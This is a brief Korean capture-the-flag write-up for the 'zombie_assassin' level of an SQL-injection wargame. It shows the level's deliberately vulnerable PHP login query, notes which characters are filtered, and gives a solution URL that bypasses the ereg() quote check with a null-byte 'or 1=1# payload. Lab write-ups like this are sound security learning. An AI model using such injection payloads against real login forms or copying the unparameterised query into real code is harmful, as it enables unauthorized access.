[los] zombie_assassin

<?php 

  include "./config.php"; 

  login_chk(); 

  dbconnect(); 

  if(preg_match('/\\\|prob|_|\.|\(\)/i', $_GET[id])) exit("No Hack ~_~"); 

  if(preg_match('/\\\|prob|_|\.|\(\)/i', $_GET[pw])) exit("No Hack ~_~"); 

  if(@ereg("'",$_GET[id])) exit("HeHe"); 

  if(@ereg("'",$_GET[pw])) exit("HeHe"); 

  $query = "select id from prob_zombie_assassin where id='{$_GET[id]}' and pw='{$_GET[pw]}'"; 

  echo "<hr>query : <strong>{$query}</strong><hr><br>"; 

  $result = @mysql_fetch_array(mysql_query($query)); 

  if($result['id']) solve("zombie_assassin"); 

  highlight_file(__FILE__); 

?>

$_GET[id], $_GET[pw] 필터

\

prob

_

.

()

싱글쿼터(')

ereg 함수 취약점을 이용해 우회

http://hackability.kr/entry/PHP-%EB%AC%B8%EC%9E%90%EC%97%B4-%ED%95%84%ED%84%B0%EB%A7%81-%ED%95%A8%EC%88%98ereg-eregi-%EC%B7%A8%EC%95%BD%EC%A0%90%EC%9D%84-%EC%9D%B4%EC%9A%A9%ED%95%9C-%EC%9A%B0%ED%9A%8C

https://los.eagle-jump.org/zombie_assassin_14dfa83153eb348c4aea012d453e9c8a.php?id=%00%27or%201=1%23